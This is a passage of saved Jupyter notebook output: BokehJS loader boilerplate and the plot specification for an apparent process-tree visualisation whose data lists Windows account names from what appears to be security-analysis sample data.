{\n const events = require('base/js/events');\n const OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n const NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n const el = document.getElementById(\"5135\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n const js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-mathjax-2.4.2.min.js\"];\n const css_urls = [];\n \n\n const inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (let i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n const cell = $(document.getElementById(\"5135\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n const docs_json = {\"7c0d3856-5269-41dc-aa9e-fbbb0a0de9ad\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"5138\"},{\"id\":\"5214\"}]},\"id\":\"5257\",\"type\":\"Row\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5202\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5203\"}}},\"id\":\"5206\",\"type\":\"Text\"},{\"attributes\":{\"range\":{\"id\":\"5141\"},\"value\":2.2},\"id\":\"5202\",\"type\":\"Dodge\"},{\"attributes\":{\"ticks\":[1,2,3,4,5]},\"id\":\"5210\",\"type\":\"FixedTicker\"},{\"attributes\":{\"range\":{\"id\":\"5143\"},\"value\":0.25},\"id\":\"5203\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5202\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5203\"}}},\"id\":\"5205\",\"type\":\"Text\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5202\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5203\"}}},\"id\":\"5207\",\"type\":\"Text\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5136\"},\"glyph\":{\"id\":\"5205\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5207\"},\"nonselection_glyph\":{\"id\":\"5206\"},\"view\":{\"id\":\"5209\"}},\"id\":\"5208\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"range\":{\"id\":\"5143\"},\"value\":0.25},\"id\":\"5195\",\"type\":\"Dodge\"},{\"attributes\":{\"below\":[{\"id\":\"5223\"}],\"center\":[{\"id\":\"5226\"},{\"id\":\"5230\"}],\"height\":700,\"left\":[{\"id\":\"5227\"}],\"renderers\":[{\"id\":\"5250\"}],\"title\":{\"id\":\"5259\"},\"toolbar\":{\"id\":\"5238\"},\"toolbar_location\":null,\"width\":90,\"x_range\":{\"id\":\"5215\"},\"x_scale\":{\"id\":\"5219\"},\"y_range\":{\"id\":\"5217\"},\"y_scale\":{\"id\":\"5221\"}},\"id\":\"5214\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"source\":{\"id\":\"5136\"}},\"id\":\"5209\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":null,\"value\":-0.5},\"id\":\"5245\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"5215\",\"type\":\"DataRange1d\"},{\"attributes\":{\"end\":370,\"start\":-1},\"id\":\"5217\",\"type\":\"Range1d\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"5267\"},\"group\":null,\"major_label_policy\":{\"id\":\"5268\"},\"ticker\":{\"id\":\"5228\"},\"visible\":false},\"id\":\"5227\",\"type\":\"LinearAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"5137\"}},\"height\":{\"value\":0.8},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5245\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"5247\",\"type\":\"Rect\"},{\"attributes\":{\"ticks\":[1,2,3,4,5]},\"id\":\"5212\",\"type\":\"FixedTicker\"},{\"attributes\":{},\"id\":\"5221\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"5219\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"5236\",\"type\":\"HelpTool\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"5270\"},\"group\":null,\"major_label_policy\":{\"id\":\"5271\"},\"ticker\":{\"id\":\"5224\"},\"visible\":false},\"id\":\"5223\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"5224\",\"type\":\"BasicTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5223\"},\"coordinates\":null,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"5226\",\"type\":\"Grid\"},{\"attributes\":{\"axis\":{\"id\":\"5227\"},\"coordinates\":null,\"dimension\":1,\"grid_line_color\":null,\"group\":null,\"ticker\":null},\"id\":\"5230\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"5228\",\"type\":\"BasicTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"5137\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5245\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"5249\",\"type\":\"Rect\"},{\"attributes\":{},\"id\":\"5232\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"5231\",\"type\":\"PanTool\"},{\"attributes\":{\"overlay\":{\"id\":\"5237\"}},\"id\":\"5233\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"5234\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"5235\",\"type\":\"ResetTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5237\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"source\":{\"id\":\"5136\"}},\"id\":\"5251\",\"type\":\"CDSView\"},{\"attributes\":{\"active_multi\":{\"id\":\"5252\"},\"tools\":[{\"id\":\"5231\"},{\"id\":\"5232\"},{\"id\":\"5233\"},{\"id\":\"5234\"},{\"id\":\"5235\"},{\"id\":\"5236\"},{\"id\":\"5252\"}]},\"id\":\"5238\",\"type\":\"Toolbar\"},{\"attributes\":{\"range\":{\"id\":\"5141\"},\"value\":0.1},\"id\":\"5194\",\"type\":\"Dodge\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"5137\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.8},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":1.2},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5245\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"5248\",\"type\":\"Rect\"},{\"attributes\":{\"source\":{\"id\":\"5136\"}},\"id\":\"5193\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"5271\",\"type\":\"AllLabels\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5136\"},\"glyph\":{\"id\":\"5247\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5249\"},\"nonselection_glyph\":{\"id\":\"5248\"},\"view\":{\"id\":\"5251\"}},\"id\":\"5250\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"5270\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"5177\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"overlay\":{\"id\":\"5253\"},\"x_range\":null,\"y_range\":{\"id\":\"5143\"}},\"id\":\"5252\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"5178\",\"type\":\"AllLabels\"},{\"attributes\":{\"text\":{\"field\":\"__cmd_line$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5186\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5187\"}}},\"id\":\"5191\",\"type\":\"Text\"},{\"attributes\":{},\"id\":\"5180\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"coordinates\":null,\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"group\":null,\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"5253\",\"type\":\"BoxAnnotation\"},{\"attributes\":{},\"id\":\"5181\",\"type\":\"AllLabels\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5136\"},\"glyph\":{\"id\":\"5170\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5172\"},\"nonselection_glyph\":{\"id\":\"5171\"},\"view\":{\"id\":\"5174\"}},\"id\":\"5173\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"coordinates\":null,\"group\":null},\"id\":\"5259\",\"type\":\"Title\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.2},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"5137\"}},\"hatch_alpha\":{\"value\":0.2},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.2},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5168\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"5172\",\"type\":\"Rect\"},{\"attributes\":{\"source\":{\"id\":\"5136\"}},\"id\":\"5174\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"5182\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"5183\",\"type\":\"Selection\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.2},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5194\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5195\"}}},\"id\":\"5199\",\"type\":\"Text\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"5137\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5168\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"5171\",\"type\":\"Rect\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5194\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5195\"}}},\"id\":\"5197\",\"type\":\"Text\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5136\"},\"glyph\":{\"id\":\"5197\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5199\"},\"nonselection_glyph\":{\"id\":\"5198\"},\"view\":{\"id\":\"5201\"}},\"id\":\"5200\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"5136\"}},\"id\":\"5201\",\"type\":\"CDSView\"},{\"attributes\":{\"end\":8,\"start\":1},\"id\":\"5141\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"5147\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"5145\",\"type\":\"LinearScale\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"items\":[{\"id\":\"5185\"}],\"label_text_font_size\":\"7pt\",\"title\":\"SubjectUserName\"},\"id\":\"5184\",\"type\":\"Legend\"},{\"attributes\":{\"below\":[{\"id\":\"5149\"}],\"center\":[{\"id\":\"5152\"},{\"id\":\"5156\"},{\"id\":\"5184\"}],\"height\":700,\"left\":[{\"id\":\"5153\"}],\"outline_line_color\":null,\"renderers\":[{\"id\":\"5173\"},{\"id\":\"5192\"},{\"id\":\"5200\"},{\"id\":\"5208\"}],\"title\":{\"id\":\"5139\"},\"toolbar\":{\"id\":\"5161\"},\"toolbar_location\":\"above\",\"width\":900,\"x_range\":{\"id\":\"5141\"},\"x_scale\":{\"id\":\"5145\"},\"y_range\":{\"id\":\"5143\"},\"y_scale\":{\"id\":\"5147\"}},\"id\":\"5138\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"callback\":null},\"id\":\"5159\",\"type\":\"TapTool\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"5177\"},\"group\":null,\"major_label_policy\":{\"id\":\"5178\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"5154\"},\"visible\":false},\"id\":\"5153\",\"type\":\"LinearAxis\"},{\"attributes\":{\"text\":{\"field\":\"__proc_name$$\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"5194\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5195\"}}},\"id\":\"5198\",\"type\":\"Text\"},{\"attributes\":{\"coordinates\":null,\"data_source\":{\"id\":\"5136\"},\"glyph\":{\"id\":\"5189\"},\"group\":null,\"hover_glyph\":null,\"muted_glyph\":{\"id\":\"5191\"},\"nonselection_glyph\":{\"id\":\"5190\"},\"view\":{\"id\":\"5193\"}},\"id\":\"5192\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":370,\"start\":349},\"id\":\"5143\",\"type\":\"Range1d\"},{\"attributes\":{\"data\":{\"Account\":[\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmi